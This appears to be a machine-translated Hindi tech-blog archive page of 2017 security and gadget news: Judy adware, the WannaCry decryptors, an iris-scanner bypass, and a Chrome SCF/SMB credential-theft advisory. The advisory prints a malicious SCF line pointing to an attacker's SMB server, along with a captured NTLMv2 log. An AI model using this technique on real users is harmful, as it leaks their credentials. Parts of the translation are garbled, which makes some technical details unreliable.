Tuesday, 30 May 2017

जूडी एंड्रॉइड मैलवेयर 36.5 मिलियन Google Play स्टोर उपयोगकर्ताओं से संक्रमित है

Leave a Comment
android-adware-malware
Thanx To THN
सुरक्षा शोधकर्ताओं ने दावा किया है कि संभवत: Google Play Store पर सबसे बड़ा मैलवेयर अभियान की खोज की गई है जो पहले से ही 36.5 मिलियन Android डिवाइसों को दुर्भावनापूर्ण विज्ञापन-क्लिक सॉफ़्टवेयर से संक्रमित कर चुका है।

सुरक्षा फर्म चेकप्वाइंट ने गुरुवार को Google Play Store पर कोरियाई कंपनी के 41 से अधिक एंड्रॉइड एप्लिकेशन का खुलासा एक ब्लॉग पोस्ट प्रकाशित किया है जो संक्रमित उपकरणों से नकली विज्ञापन क्लिक्स बनाकर इसके निर्माता के लिए पैसे कमाता है।

कोरिया-आधारित कीनीविनी द्वारा विकसित और मॉनीकर एनिस्टाइओ कॉर्प के तहत प्रकाशित सभी दुर्भावनापूर्ण ऐप्स में एक एडवेयर प्रोग्राम है, जो जुडी नामक है, जिसका उपयोग विज्ञापन से राजस्व उत्पन्न करने के लिए धोखाधड़ी वाले क्लिक उत्पन्न करने के लिए किया जा रहा है।

इसके अलावा, शोधकर्ताओं ने प्ले स्टोर पर अन्य डेवलपर्स द्वारा प्रकाशित कुछ और ऐप भी खुलासा किए, जिसमें उन में मैलवेयर को अनजाने में रखा गया था।

दोनों अभियानों के बीच का संबंध अस्पष्ट बना हुआ है, हालांकि शोधकर्ताओं का मानना ​​है कि यह संभव है कि एक डेवलपर दूसरे से कोड उधार लिया, "जानबूझकर या अनजाने में।"
"यह काफी असामान्य है कि मोबाइल मैलवेयर के पीछे एक वास्तविक संगठन खोजना, क्योंकि उनमें से ज्यादातर को विशुद्ध रूप से दुर्भावनापूर्ण कलाकारों द्वारा विकसित किया गया है," चेकपॉइंट शोधकर्ताओं का कहना है।
प्ले स्टोर पर मौजूद ऐप्स सीधे किसी भी दुर्भावनापूर्ण कोड को शामिल नहीं करते हैं जो Google बाउंसर सुरक्षा को बायपास करने के लिए ऐप्स को सहायता करता है।
android-adware-malware

डाउनलोड करने के बाद, एप्लिकेशन चुपचाप उपयोगकर्ता डिवाइस को एक दूरस्थ कमांड और नियंत्रण सर्वर पर पंजीकृत करता है, और उत्तर में, यह वास्तविक दुर्भावनापूर्ण पेलोड को प्राप्त करता है जिसमें एक जावास्क्रिप्ट है जो वास्तविक दुर्भावनापूर्ण प्रक्रिया शुरू करता है।

"मैलवेयर उपयोगकर्ता के एजेंट का प्रयोग करके यूआरएल खोलता है जो एक छिपे हुए वेबपेज में पीसी ब्राउज़र की नकल करता है और किसी अन्य वेबसाइट पर पुनर्निर्देशन करता है," शोधकर्ताओं का कहना है। "एक बार जब लक्षित वेबसाइट लॉन्च की जाती है, तो मैलवेयर जावास्क्रिप्ट कोड का उपयोग करने के लिए और गूगल विज्ञापन की बुनियादी सुविधाओं से बैनर पर क्लिक करने का उपयोग करता है।"
दुर्भावनापूर्ण एप्लिकेशन वास्तविक वैध गेम हैं, लेकिन पृष्ठभूमि में, वे पीड़ित के डिवाइस को एडवेयर सर्वर से कनेक्ट करने के लिए एक पुल के रूप में कार्य करते हैं।

एक बार कनेक्शन स्थापित हो जाने पर, दुर्भावनापूर्ण ऐप्स उपयोगकर्ता एजेंटों को धोखा देते हैं कि वे स्वयं एक डेस्कटॉप ब्राउज़र के रूप में नकल करें और एक पेज खोलें और क्लिक्स उत्पन्न करें।

यहां किनीविनी द्वारा विकसित दुर्भावनापूर्ण ऐप्स की एक सूची दी गई है और यदि आपके पास इनमें से कोई भी आपके डिवाइस पर इंस्टॉल है, तो इसे तुरंत हटा दें:

  • फैशन जुडी: बर्फ की रानी शैली
  • पशु जुडी: फ़ारसी बिल्ली देखभाल
  • फैशन जुडी: सुंदर रैपर
  • फैशन जूडी: शिक्षक शैली
  • पशु जुडी: ड्रैगन की देखभाल
  • बावर्ची जमी: हेलोवीन कुकीज़
  • फैशन जूडी: वेडिंग पार्टी
  • पशु जुडी: टेडी बैर देखभाल
  • फैशन जूडी: बनी लड़की शैली
  • फैशन जुडी: जमे हुए राजकुमारी
  • बावर्ची जूडी: त्रिकोणीय Kimbap
  • बावर्ची जूडी: उदोंग निर्माता - कुक
  • फैशन जूडी: वर्दी शैली
  • पशु जुडी: खरगोश देखभाल
  • फैशन जूडी: पिशाच शैली
  • पशु जूडी: नौ-पूंछ फॉक्स
  • बावर्ची जूडी: जेली मेकर - कुक
  • बावर्ची जूडी: चिकन निर्माता
  • पशु जुडी: सागर ओटर देखभाल
  • पशु जुडी: हाथी देखभाल
  • जुडी हैप्पी हाउस
  • बावर्ची जूडी: हॉटडॉग निर्माता - कुक
  • बावर्ची जूडी: जन्मदिन का खाना निर्माता
  • फैशन जुडी: शादी का दिन
  • फैशन जूडी: वेटरस शैली
  • बावर्ची जूडी: चरित्र दोपहर का भोजन
  • बावर्ची जूडी: पिकनिक दोपहर के भोजन के निर्माता
  • पशु जुडी: रूडोल्फ की देखभाल
  • जुडी के अस्पताल: बाल रोग
  • फैशन जूडी: देश शैली
  • पशु जुडी: फेल कैट केयर
  • फैशन जूडी: दो बार शैली
  • फैशन जूडी: मिथ स्टाइल
  • पशु जुडी: फेंनेक फॉक्स की देखभाल
  • पशु जूडी: कुत्ते की देखभाल
  • फैशन जूडी: युगल शैली
  • पशु जुडी: बिल्ली देखभाल
  • फैशन जुडी: हेलोवीन शैली
  • फैशन जुडी: EXO शैली
  • बावर्ची जमी: Dalgona निर्माता
  • बावर्ची जूडी: सर्विसस्टेशन फूड
  • जूडी की स्पा सैलून

पिछले साल अप्रैल में इन ऐप के कम से कम एक प्ले स्टोर पर अंतिम बार अपडेट किया गया था, इसका मतलब है कि दुर्भावनापूर्ण ऐप्स एक वर्ष से भी ज्यादा समय तक प्रचार कर रहे थे।

Google ने अब Play Store से सभी उपर्युक्त दुर्भावनापूर्ण ऐप्स को हटा दिया है, लेकिन चूंकि Google बाउंसर आधिकारिक स्टोर से खराब ऐप्स को रखने के लिए पर्याप्त नहीं है, इसलिए आपको एप्लिकेशन डाउनलोड करने के बारे में सावधान रहना होगा।
Read More

Saturday, 27 May 2017

Hackers Again Proof , They Can Hack Everything--Pirates Of The Caribbean 5 leaked

1 comment
Pirates-of-the-Caribbean-5-Dead-Men-Tell-No-Tales-leaked
अपडेट: बाद में, एक 54 जीबी धार फ़ाइल (उपयोगकर्ता द्वारा डार्क-ओवरएल द्वारा अपलोड किया गया) समुद्री डाकू बे पर दिखाई दिया फॉस्बाइएट ने किसी भी लीक टॉरेन की सामग्री का सत्यापन नहीं किया है। हालांकि, किसी भी लीक टॉरेन में कथित तौर पर डिज्नी की द पाइरेट्स ऑफ द कॅरिबियन 5 की एक प्रति है।
जैसा कि टोरेंटफ्रैक ने बताया, इस कहानी ने पहले यह मान लिया था कि यह फिल्म इसी नाम के टोरेंटों का हिस्सा थी जो ऑनलाइन दिखाई दी थी।
डब्ल्यूई ने अपनी रिहाई के आगे कई इकलौते फिल्में देखी हैं। TheDarkOverlord नामक एक हैकर समूह द्वारा बहुत-प्रतीक्षित डिज्नी फिल्म कैरिबियन 5 डेड मैन टेल नान टेल्स को समझौता किया गया था।
हैकर्स ने वेब पर फिल्मों को रिसाव करने की धमकी दी, यदि डिस्नी ने बिटकॉन्स में फिरौती का भुगतान नहीं किया लोगों के लिए आश्चर्य की बात है, फिरौती का भुगतान नहीं किया गया था और फिल्म का एक धार लिंक द समुद्री डाकू बे पर अपलोड किया गया था। हालांकि, हैकर समूह को पकड़ने के लिए प्रोडक्शन हाउस एफबीआई के साथ काम कर रहा है।

हालांकि स्पष्ट रूप से नामित नहीं, कार 3 एक ऐसी फिल्म है जो हैकर्स चोरी करने में कामयाब हो सकती थी।
सॉफ्टपीडिया के अनुसार , इंटरनेट पर दिखाई देने के बाद पायरेटेड धार लिंक हटा दिए गए हैं। लेकिन यह काफी संभव है कि लीक वाली फिल्म फिर से आगे बढ़ सकती है क्योंकि कुछ लोग इसे अब डाउनलोड कर सकते हैं या हैकर समूह इसे पुनः अपलोड करता है
यदि आपके पास कुछ जोड़ने के लिए है, तो अपने विचारों और प्रतिक्रिया को छोड़ दें
Read More

Thursday, 25 May 2017

It's Insanely Easy to Bypass Samsung Galaxy S8 Iris Scanner with a Photo In Hindi

Leave a Comment
samsung-galaxy-s8-iris-scanner-bypass-unlock-hack
Thnx To THN
सैमसंग ने हाल ही में अपने नए फ्लैगशिप स्मार्टफ़ोन, गैलेक्सी एस 8 और गैलेक्सी एस 8 प्लस को चेहरे और आईआरआईएस मान्यता सुविधाओं के साथ लॉन्च किया है, जिससे उपयोगकर्ताओं को अपने स्मार्टफोन को अनलॉक करने और वेबसाइटों पर हस्ताक्षर करना आसान हो जाता है।

हम पहले से ही जानते थे कि आकाशगंगा एस 8 के चेहरे की अनलॉक सुविधा को आसानी से डिवाइस के मालिक की एक साधारण तस्वीर के साथ बेवकूफ़ बनाया जा सकता है , लेकिन अब हैकर्स ने आईरिस आधारित प्रमाणीकरण को बायपास करने का एक आसान तरीका खोज लिया है, जो कि सैमसंग चाहता है कि आप सोचें कि वह अपराजेय है

गैलेक्सी एस 8 की आईरिस-मान्यता प्रणाली को तोड़ने के लिए जर्मन हैकिंग ग्रुप कैओस कम्प्यूटर क्लब (सीसीसी) के लिए यह कैमरा, प्रिंटर और एक संपर्क लेंस था।

सफेद टोपी हैकिंग ग्रुप ने भी एक वीडियो प्रकाशित किया जो दिखा रहा है कि सैमसंग की आईरिस स्कैनर कैसे हार जाए।


प्रक्रिया बहुत सरल थी। सीसीसी समूह ने अपने विषय की एक मध्यम श्रेणी की तस्वीर को कैप्चर करने के लिए सोनी डिजिटल कैमरे पर रात्रि मोड सेटिंग का इस्तेमाल किया।

चूंकि आईरिस स्कैनर अवरक्त प्रकाश का उपयोग करता है, तब समूह ने एक सैमसंग प्रिंटर का उपयोग करके एक आंख की एक वास्तविक जीवन आकार की अवरक्त छवि को मुद्रित किया और कुछ गहराई प्रदान करने के लिए मुद्रित चित्र के शीर्ष पर एक संपर्क लेंस रखा। और, यह किया गया था।

सैमसंग गैलेक्सी एस 8 ने तुरंत मारे फोटो को "असली" मानवीय आँख के रूप में पहचाना और फोन को अनलॉक कर दिया, जिसमें हैकर्स को सैमसंग पे सहित फोन पर पूर्ण पहुंच प्रदान की गई।


इसलिए, हैकर्स ने सफलतापूर्वक गैलेक्सी एस 8 के आईरिस-आधारित प्रमाणीकरण को टाल दिया, जो सैमसंग का दावा है "अपना फोन लॉक रखने के सबसे सुरक्षित तरीकों में से एक है।"
"आपके irises में पैटर्न आप के लिए अद्वितीय हैं और दोहराने के लिए लगभग असंभव हैं, जिसका अर्थ है परितारिका प्रमाणीकरण आपके फोन को लॉक रखने के लिए सबसे सुरक्षित तरीके से है और सामग्री निजी है," सैमसंग की आधिकारिक वेबसाइट पढ़ती है।
यहां पर सैमसंग ने आईरिस-मान्यता प्रणाली हैक के बारे में कहा है:
"हम इस मुद्दे से अवगत हैं, लेकिन हम अपने ग्राहकों को आश्वस्त करना चाहते हैं कि गैलेक्सी एस 8 में आईरिस स्कैनिंग प्रौद्योगिकी को कठोर परीक्षण के माध्यम से विकसित किया गया है ताकि उच्च स्तर की सटीकता प्रदान की जा सके और इसकी सुरक्षा में समझौता करने के प्रयासों को रोक सकें, जैसे कि चित्र एक व्यक्ति की परितारिका। अगर कोई संभावित जोखिम या एक नई पद्धति का आगमन होता है जो किसी भी समय सुरक्षा सुनिश्चित करने के हमारे प्रयासों को चुनौती देता है, तो हम इस मुद्दे को हल करने के लिए जितनी जल्दी हो सके प्रतिक्रिया देंगे। "
यह पहली बार नहीं है जब सीसीसी ने बॉयोमीट्रिक प्रणालियों में काट दिया। स्वर्गीय 2014, समूह ने जर्मनी के एक संघीय मंत्री के एक सटीक अंगूठे की छाप का निर्माण किया जिसमें एक मानक फोटो का उपयोग किया गया था जो कि किसी भी फिंगरप्रिंट सुरक्षा प्रणाली को बेवकूफ़ बना सकता था। इसी तकनीक का भी दावा किया गया है कि आईआरआईएस बॉयोमीट्रिक सुरक्षा प्रणालियों को बेवकूफ बनाने के लिए इस्तेमाल किया जा सकता है।

मार्च 2013 में, सीसीसी ग्रुप ने एप्पल के टचआईड फिंगरप्रिंट प्रमाणीकरण प्रणाली को बेवकूफ़ बना दिया।

इसलिए, यह लोगों के लिए हमेशा एक मजबूत पासकोड और डिवाइस एन्क्रिप्शन पर छड़ी करने के लिए एक अच्छा अनुस्मारक है, जैसे कि फिंगरप्रिंट स्कैन, आईआरआईएस स्कैन, या चेहरे की पहचान जैसे बॉयोमीट्रिक फीचर्स पर भरोसा करने के बजाय, अपने डिवाइस को सुरक्षित करने के लिए, जो अंततः एक निर्धारित हैकर।
Read More

Saturday, 20 May 2017

आ रहा है दुनिया का सबसे शक्तिशाली लैपटॉप,आप कीमत जानने के बाद चकित होंगे !

2 comments

ASUS ROG GX800 संक्षिप्त विवरण


एएसयूएस रोग जीएक्स 800 एसएलआई में दो NVIDIA GTX 1080 के साथ गेमिंग लैपटॉप है, एक 4K यूएचडी डिस्प्ले और आरजीबी बैकलाइटिंग के साथ एक मैकेनिकल कीबोर्ड। यह क्वाड-कोर 2. 9GHz इंटेल कोर i7-7820 एचके प्रोसेसर, 64 जीबी रैम और तीन 512 जीबी पीसीआईई एसएसडीएस स्टोर्स की एक सरणी के द्वारा संचालित है। यह 18.4 इंच की एलईडी-बैकलिट 4 के स्क्रीन को एनवीडिया जी-सिंक चर रिफ्रेश दर के साथ एक अंतराल नि: शुल्क गेमिंग अनुभव प्रदान करता है। कनेक्टिविटी मोर्चे पर, यह तीन मानक यूएसबी 3.0 बंदरगाह, गीगाबिट ईथरनेट, एक एचडीएमआई पोर्ट, मिनी-डिस्प्ले पोर्ट, थंडरबोल्ट 3.0 और 10 जीबीपीएस यूएसबी 3.1 (जनरल 2) हाई-स्पीड कनेक्टिविटी के लिए और बाह्य डिस्प्ले को चलाने के लिए समर्थन करता है। यूनिट के साथ जल शीतलक मॉड्यूल या हाइड्रो ओवरक्लिंग सिस्टम शामिल है। यह प्रोसेसर और ग्राफिक्स कार्डों के अतिव्यापी ओवरलैक्लिंग के लिए आवश्यक ठंडा प्रदर्शन प्रदान करता है। इस गेमिंग लैपटॉप की कीमत भारत में 7, 97, 909 रुपये है।


ASUS ROG GX800 विशिष्टता

मूल सूचना-मॉडल का नाम
एएसयूएस आरओजी जीएक्स 800
लैपटॉप प्रकार-गेमिंग
प्रदर्शन
प्रदर्शन का आकार (इंच में) -18.4
प्रदर्शन तकनीक ---- एलईडी-बैकलिट 4 के स्क्रीन
कनेक्टिविटी
कनेक्टिविटी- 3 एक्स यूएसबी 3.0 1 एक्स यूएसबी 3.1 1 एक्स वज्र 3.0 एचडीएमआई 1 एक्स मिनी डिस्प्ले पोर्ट

स्मृति-RAM शामिल (जीबी में) 64


शारीरिक विनिर्देश
लैपटॉप वजन (किग्रा में) -5.7
प्रोसेसर
प्रोसेसर मॉडल का नाम-इंटेल कोर i7 (7 वीं पीढ़ी)
घड़ी की गति -2.9 गीगाहर्ट्ज
कोर-Quad
ग्राफिक्स प्रोसेसर- NVIDIA GeForce GTX 1080
भंडारण हार्ड ड्राइव प्रकार
एसएसडी हार्ड ड्राइव की क्षमता- 512 जीबी(can change)
ध्वनि वक्ताओं-ट्रैक्टर स्पीकर
 

Read More

Friday, 19 May 2017

WannaCry Ransomeware Decryption Tool Released 😁😇😇

Leave a Comment
wannacry-ransomware-decryption-tool-unlock-files-free
Thanx To THN
यदि आपके पीसी को WannaCry द्वारा संक्रमित किया गया है - पिछले शुक्रवार को दुनिया भर में कहर बरकरार रखने वाले रेंसोमवेयर - आप साइबर अपराधियों को $ 300 के फिरौती के बिना भुगतान किए गए अपनी फ़ाइलों को वापस प्राप्त करने के लिए भाग्यशाली हो सकते हैं।

क्वार्कस्लैब के एक फ्रांसीसी सुरक्षा शोधकर्ता एड्रियन गिनीत ने WannaCry ransomware द्वारा उपयोग की गई गुप्त एन्क्रिप्शन कुंजी को पुनर्प्राप्त करने का तरीका खोज लिया है, जो कि विंडोज एक्सपी, विंडोज 7, विंडोज विस्टा, विंडोज सर्वर 2003 और 2008 ऑपरेटिंग सिस्टम पर काम करता है।

WannaCry Ransomware डिक्रिप्शन कुंजी


WannaCry की एन्क्रिप्शन योजना पीड़ित के कंप्यूटर पर कुंजी की एक जोड़ी पैदा करके काम करती है जो मुख्य संख्या, एक "सार्वजनिक" कुंजी और क्रमशः सिस्टम की फ़ाइलों को एन्क्रिप्ट करने और डिक्रिप्ट करने के लिए एक "निजी" कुंजी पर भरोसा करती है।

पीड़ित को निजी कुंजी तक पहुंचने और लॉक किए गए फ़ाइलों को डिक्रिप्ट करने से रोकने के लिए, WannaCry सिस्टम से चाबी मिटा देता है, जिससे कि हमलावर को फिरौती का भुगतान करने के अलावा डिक्रिप्शन कुंजी को पुनः प्राप्त करने के लिए पीडि़तों के लिए कोई विकल्प नहीं बचा।

Guinet कहते हैं , लेकिन यहाँ किकर है: WannaCry "स्मृति से मूल स्मृति यादों को मिटा नहीं करता है,"

इस खोज के आधार पर, गिनीत ने WannaKry नामक एक WannaCry ransomware decryption उपकरण जारी किया, जो मूल रूप से दो प्रमुख संख्याओं को पुनः प्राप्त करने की कोशिश करता है, जो सूत्र में एन्क्रिप्शन कुंजी को स्मृति से उत्पन्न करता है।

यह उनके लिए wcry.exe प्रक्रिया में खोज करके ऐसा करता है। यह आरएसए निजी कुंजी उत्पन्न करने वाली प्रक्रिया है। मुख्य मुद्दा यह है कि CryptDestroyKey और CryptReleaseContext संबंधित स्मृति को मुक्त करने से पहले स्मृति से प्रधान संख्याओं को मिटा नहीं है। " Guinet कहते हैं

इसलिए, इसका मतलब है, यह विधि केवल तभी काम करेगी जब:

  • संक्रमित होने के बाद प्रभावित कंप्यूटर को रिबूट नहीं किया गया है।
  • संबद्ध स्मृति को किसी अन्य प्रक्रिया द्वारा आवंटित नहीं किया गया है और मिटा दिया गया है।
काम करने के लिए, संक्रमित होने के बाद आपका कंप्यूटर रिबूट नहीं होना चाहिए। कृपया यह भी ध्यान दें कि इसके लिए आपको काम करने के लिए कुछ भाग्य चाहिए (नीचे देखें), और इसलिए यह हर मामले में काम नहीं करेगा! " गिनीत कहते हैं।

यह वाकई ransomware लेखकों से एक गलती नहीं है, क्योंकि वे ठीक से Windows क्रिप्टो एपीआई का इस्तेमाल करते हैं। "


जबकि WannaKey केवल प्रभावित कंप्यूटर की स्मृति से प्रमुख संख्या खींचती है, उपकरण केवल उन लोगों द्वारा उपयोग किया जा सकता है जो डिक्रिप्शन कुंजी को मैन्युअल रूप से अपने WannaCry- संक्रमित पीसी की फ़ाइलों को डिक्रिप्ट करने के लिए उन प्रमुख संख्याओं का उपयोग कर सकते हैं

वानाकी: WannaCry Ransomware डिक्रिप्शन टूल

अच्छी खबर यह है कि एक और सुरक्षा शोधकर्ता, बेंजामिन डेली , ने गिनट की खोज के आधार पर " वानाकीवी " नामक एक आसान-उपकरण का उपयोग किया, जो कि वन्नी-संक्रमित फ़ाइल डिक्रिप्शन की पूरी प्रक्रिया को सरल करता है।

सभी पीड़ितों को करना है, गीताब से वनाकी उपकरण डाउनलोड करें और इसे अपने प्रभावित विंडोज कंप्यूटर पर कमांड लाइन (सीएमडी) का उपयोग कर चलाएं।

वनाकीवी विंडोज एक्सपी, विंडोज 7, विंडोज विस्टा, विंडोज सर्वर 2003 और 2008 पर काम करती है, सुरक्षा फर्म कॉमेई टेक्नोलॉजीज से मैट सुच की पुष्टि की है, जिन्होंने अपनी फाइलों को डिक्रिप्ट करने के लिए वानाकी का इस्तेमाल करने के तरीके को दिखाते हुए कुछ प्रदर्शन भी प्रदान किए हैं ।
Read More

Create Localhost In Android & Improve Hacking Skills Part-1

Leave a Comment
Welcome Guys , Welcome To Hax4Us
Hax4us. Com
Dosto aaj hum baat karne wale local host ke baare me ki kese hum apne Android Mobile me local host create kar sakte hai....

Isske liye aapko 1 thing Required Hogi





  1. PAW Server (Download)
To Ab jab aap PAW download kar chuke hai then ab aap meri video dekho or practical knowledge ka maza lo bcz likhte to sab hai but practical ka maza hi alag hai...kyo.?


Video Play Na Ho To Niche Link Pe Click Karke Bhi Dekh Sakte Ho


Jaldi hi iska PART-2 bhi release hoga jisme hum apni local host site ko online me convert Karenge then Part-3 me SQL injection perform Karenge apne hi server ki apni site pe ....stay connected for updates...

What Is Local Host ? Click Here

What Is ARP Spoofing ? Click Here
Read More

Thursday, 18 May 2017

Oppo A77 Launched , 16MP सेल्फी कैमरे से लैस

Leave a Comment
Oppo

मोबाइल डिवाइसेस निर्माता कंपनी Oppo ने बाज़ार में अपना नया स्मार्टफ़ोन Oppo A77 लॉन्च कर दिया है. ताइवान में इस स्मार्टफ़ोन की कीमत NTD 10990 (लगभग Rs. 23,414) रखी गई है और फ़िलहाल यह ताइवान के बाज़ार में ही सेल होगा. इस स्मार्टफ़ोन को कंपनी की ताइवान स्थित वेबसाइट पर लिस्ट किया गया है और यह कल से प्री-ऑर्डर के लिए भी उपलब्ध होगा. इसे 26 मई से ख़रीदा जा सकेगा और यह गोल्ड और रोज गोल्ड रंग में उपलब्ध होगा.
Oppo A77 के फीचर्स पर नज़र डालें तो इसमें 5.5-इंच की फुल HD डिस्प्ले दी गई है. इस डिस्प्ले का रेजोल्यूशन 1080x1280 पिक्सल है. इसमें मीडियाटेक MT6750T ओक्टा कोर 1.5GHz प्रोसेसर मौजूद है. यह 4GB की रैम और 64GB की इंटरनल स्टोरेज से लैस है, स्टोरेज को माइक्रोएसडी कार्ड के जरिये बाध्य भी जा सकता है. यह स्मार्टफ़ोन एंड्राइड 6.0.1 मार्शमैलो ऑपरेटिंग सिस्टम पर आधारित कलर ऑपरेटिंग सिस्टम 3.0 पर काम करता है. इसमें 3200mAh की बैटरी भी मौजूद है. यह फिंगरप्रिंट सेंसर से लैस है जिसे होम बटन भी दिया गया है.
Oppo A77 में मौजूद कैमरा सेटअप पर नज़र डालें तो इसमें 13 मेगापिक्सल का रियर कैमरा f/2.2 अपर्चर, PDAF, LED फ़्लैश के साथ दिया गया है. इसमें 16 मेगापिक्सल का फ्रंट फेसिंग कैमरा f/2.0 अपर्चर और ब्यूटी 4.0 और पोर्ट्रेट मॉड के साथ दिया गया है. यह हाइब्रिड डुअल सिम सपोर्ट, 4G, वाई-फाई, ब्लूटूथ और GPS जैसे फीचर्स मौजूद हैं. इसकी मोटाई 7.3mm है और इसका वजन 153 ग्राम है.
Read More

BEWARE ! हैकर्स दूरस्थ रूप से क्रोम का उपयोग कर Aapke विंडोज पासवर्ड चोरी कर सकते हैं

Leave a Comment
google-chrome-windows-password-hacking-scf-smb
Thanx To THN
एक सुरक्षा शोधकर्ता ने माइक्रोसॉफ्ट के विंडोज ऑपरेटिंग सिस्टम के किसी भी संस्करण पर चलने वाले Google के क्रोम के नवीनतम संस्करण के डिफ़ॉल्ट कॉन्फ़िगरेशन में गंभीर भेद्यता की खोज की है, जिसमें विंडोज 10 शामिल है, जो दूरस्थ हैकर्स को उपयोगकर्ता के लॉगिन क्रेडेंशियल्स को चोरी करने की इजाजत दे सकता है।

डिफेंसकोड के शोधकर्ता बोस्को स्टेनोकोविक ने पाया है कि एक दुर्भावनापूर्ण एससीएफ फ़ाइल वाली वेबसाइट पर जाकर पीड़ितों को अनजाने में अपने कंप्यूटर के प्रवेश प्रमाण पत्र को क्रोम और एसएमबी प्रोटोकॉल के माध्यम से हैकर्स के साथ साझा कर सकते हैं।

यह तकनीक नई नहीं है और इसका उपयोग स्टक्सनेट - एक शक्तिशाली मैलवेयर द्वारा किया गया था जो विशेष रूप से ईरान के परमाणु प्रोग्राम को नष्ट करने के लिए डिज़ाइन किया गया था - जो सिस्टम को समझौता करने के लिए विंडोज शॉर्टकट एलएनके फ़ाइलों का इस्तेमाल करता था

यह हमला दूसरों से अलग क्यों है यह तथ्य है कि इंटरनेट एक्सप्लोरर (आईई) और एज के बाद, इस तरह के एसएमबी प्रमाणीकरण संबंधित हमलों को सार्वजनिक रूप से पहली बार Google क्रोम पर प्रदर्शित किया गया है।

क्रोम + एससीएफ + एसएमबी = स्टीलिंग विंडोज क्रेडेंशियल्स


एससीएफ (शेल कमांड फाइल) शॉर्टकट फ़ाइल स्वरूप एलएनके फाइलों के समान काम करता है और यह विंडोज एक्सप्लोरर के एक सीमित सेट का समर्थन करने के लिए डिज़ाइन किया गया है जो आपके डेस्कटॉप पर एक आइकन, जैसे मेरा कंप्यूटर और रीसायकल बिन को परिभाषित करने में मदद करता है।

"स्टैनकोविच ने एक ब्लॉग पोस्ट में लिखा," वर्तमान में, हमलावर को पीडि़त (पूरी तरह से अद्यतित Google क्रोम और विंडोज का उपयोग करके) को लुभाने की जरूरत है ताकि वे पीड़ित के प्रमाणीकरण क्रेडेंशियल को आगे बढ़ाने और पुनः उपयोग करने में सक्षम हो सकें। "
असल में, आपके डेस्कटॉप पर शॉर्टकट लिंक्स शैल कोड के विशिष्ट सिंटैक्स वाला एक टेक्स्ट फाइल है जो कि आइकन / थंबनेल, एप्लिकेशन का नाम और उसके स्थान का स्थान निर्धारित करता है।
[शेल]
कमान = 2
IconFile = explorer.exe, 3
चूंकि क्रोम विंडोज एससीएफ फाइलों का भरोसा करता है, हमलावर पीड़ितों को उनकी वेबसाइट पर जा सकते हैं जिसमें दुर्भावनापूर्ण ढंग से तैयार की गई शॉर्टकट फाइल होती है, जो उपयोगकर्ताओं से पुष्टि के बिना स्वचालित रूप से लक्ष्य सिस्टम पर डाउनलोड हो जाती है।

जैसे ही प्रयोक्ता उस फ़ोल्डर को खोलता है जो कि डाउनलोड की गई फ़ाइल को तुरंत या बाद में रखती है, यह फ़ाइल स्वचालित रूप से उस आइकन को बिना उस आइकन पर प्राप्त करने के लिए चलाती है जिस पर उस पर क्लिक किया जाता है

लेकिन किसी आइकन छवि के स्थान को स्थापित करने के बजाय, हमलावर द्वारा बनाई गई दुर्भावनापूर्ण एससीएफ फ़ाइल में एक दूरस्थ SMB सर्वर (हमलावर द्वारा नियंत्रित) का स्थान होता है।

[शेल]
IconFile = \\ 170.170.170.170 \ आइकन
इसलिए, जैसे ही एससीएफ फाइल आइकन की छवि को पुनः प्राप्त करने का प्रयास करता है, यह एसएमबी प्रोटोकॉल पर हमलावर के नियंत्रित रिमोट सर्वर के साथ एक स्वचालित प्रमाणीकरण बनाने की कोशिश करेगा, पीड़ित के उपयोगकर्ता नाम को सौंपेगा और पासवर्ड का हैड किया गया संस्करण देगा, जिससे हमलावर को आपके आपके व्यक्तिगत कंप्यूटर या नेटवर्क संसाधन को प्रमाणित करने के लिए क्रेडेंशियल्स

"रिमोट एसएमबी सर्वर पर एक आइकन स्थान सेट करना एक ज्ञात हमला वेक्टर है जो विंडोज़ स्वचालित प्रमाणन सुविधा को दुर्व्यवहार करता है जब रिमोट फाइल शेयर जैसी सेवाओं तक पहुंचना होता है," स्टैंकोविक ने कहा।

लेकिन स्टक्सनेट के हमलों के बाद, माइक्रोसॉफ्ट ने एलएनके फाइल को केवल स्थानीय संसाधनों से अपने माउस को लोड करने के लिए मजबूर किया क्योंकि वे ऐसे ऐसे हमलों के प्रति अधिक संवेदनशील नहीं रहेंगे जो उन्हें बाहरी सर्वरों से दुर्भावनापूर्ण कोड लोड करने में सक्षम बनाते हैं।

हालांकि, एससीएफ फाइल अकेले छोड़ दी गई थी

एससीएफ फाइल के माध्यम से एलएम / एनटीएलएम हैश प्रमाणीकरण का शोषण

Exploiting LM/NTLM Hash Authentication
छवि स्रोत: एसएएनएस
लेकिन आपके विंडोज पीसी ने आपके क्रेडेंशियल्स को सर्वर पर स्वचालित रूप से हाथ क्यों सौंप दिया?

यदि आप अनजान हैं, तो सर्वर संदेश ब्लॉक (एसएमबी) प्रोटोकॉल के माध्यम से प्रमाणीकरण NTLM चुनौती / प्रतिक्रिया प्रमाणन तंत्र के साथ संयोजन में काम करता है।

संक्षेप में, एलएम / एनटीएलएम प्रमाणीकरण 4 चरणों में काम करता है:

  • विंडोज़ प्रयोक्ता (क्लाइंट) सर्वर में लॉग इन करने का प्रयास करता है
  • सर्वर एक चुनौती मूल्य के साथ प्रतिक्रिया करता है, उपयोगकर्ता को अपने हैश पासवर्ड के साथ चुनौती मान को एन्क्रिप्ट करने और उसे वापस भेजना कहता है।
  • विंडोज एससीएफ अनुरोध को ग्राहक के यूज़रनेम और सर्वर के पासवर्ड के हैशेड संस्करण भेजकर संभालता है।
  • सर्वर तब प्रतिक्रिया को कैप्चर करता है और प्रमाणीकरण को स्वीकार करता है, अगर ग्राहक का हैश पासवर्ड सही है
अब, एससीएफ हमले के परिदृश्य में, स्टैंकोविच द्वारा सविस्तार, विंडोज दुर्भावनापूर्ण SMB सर्वर को स्वचालित रूप से पीड़ित के उपयोगकर्ता नाम और NTLMv2 पासवर्ड हैश (एक निजी कंप्यूटर या नेटवर्क संसाधन) को सर्वर पर प्रमाणित करने का प्रयास करेगा, जैसा कि उपर्युक्त में वर्णित है चरण 3।

अगर उपयोगकर्ता एक कार्पोरेट नेटवर्क का हिस्सा है, तो उपयोगकर्ता को अपनी कंपनी के sysadmin द्वारा निर्दिष्ट नेटवर्क क्रेडेंशियल्स को हमलावर भेज दिया जाएगा।

यदि शिकार घर का उपयोगकर्ता है, तो शिकारकर्ता का विंडोज़ उपयोगकर्ता नाम और पासवर्ड हमलावर को भेज दिया जाएगा।

[*] एसएमबी कैप्चर - 2017-05-15 13:10:44 +0200
173.203.29.182:62521 - 173.203.2 9 .82 से कब्जा कर लिया गया NTLMv2 प्रतिक्रिया
USER: बोस्को डोमेन: मास्टर ओएस: एलएम:
